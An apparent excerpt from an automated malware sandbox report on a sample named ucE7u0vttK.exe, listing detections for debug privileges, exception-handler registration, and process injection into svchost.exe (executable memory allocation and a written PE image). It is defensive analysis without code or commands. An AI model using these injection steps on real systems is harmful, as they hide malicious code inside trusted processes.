Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D1D90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap,2_2_003D1D90
Enables debug privilegesShow sources
Source: C:\Windows\System32\svchost.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C952C SetUnhandledExceptionFilter,2_2_003C952C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C2B83 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_003C2B83
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_0039952C SetUnhandledExceptionFilter,4_2_0039952C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_00392B83 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00392B83

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 70000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10001000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10010000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10014000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10017000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: C0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: C0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: C0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 100000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 110000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: C0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 100000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 110000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 360000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 70000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10001000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1001A000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10022000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 100BA000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 100BB000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 100BC000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 160000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 170000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 170000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B0000 protect: page execute and read and writeJump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10000000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10000000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 60000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: EE2104Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10000000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10014000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10014000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10017000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10017000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010018Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001001CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010020Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010024Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010028Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001002CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010030Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010034Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010038Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001003CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010040Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010044Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010048Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001004CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010050Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010054Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010058Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001005CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010060Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010064Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010068Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001006CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010070Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010074Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010078Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001007CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010080Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010084Jump to behavior
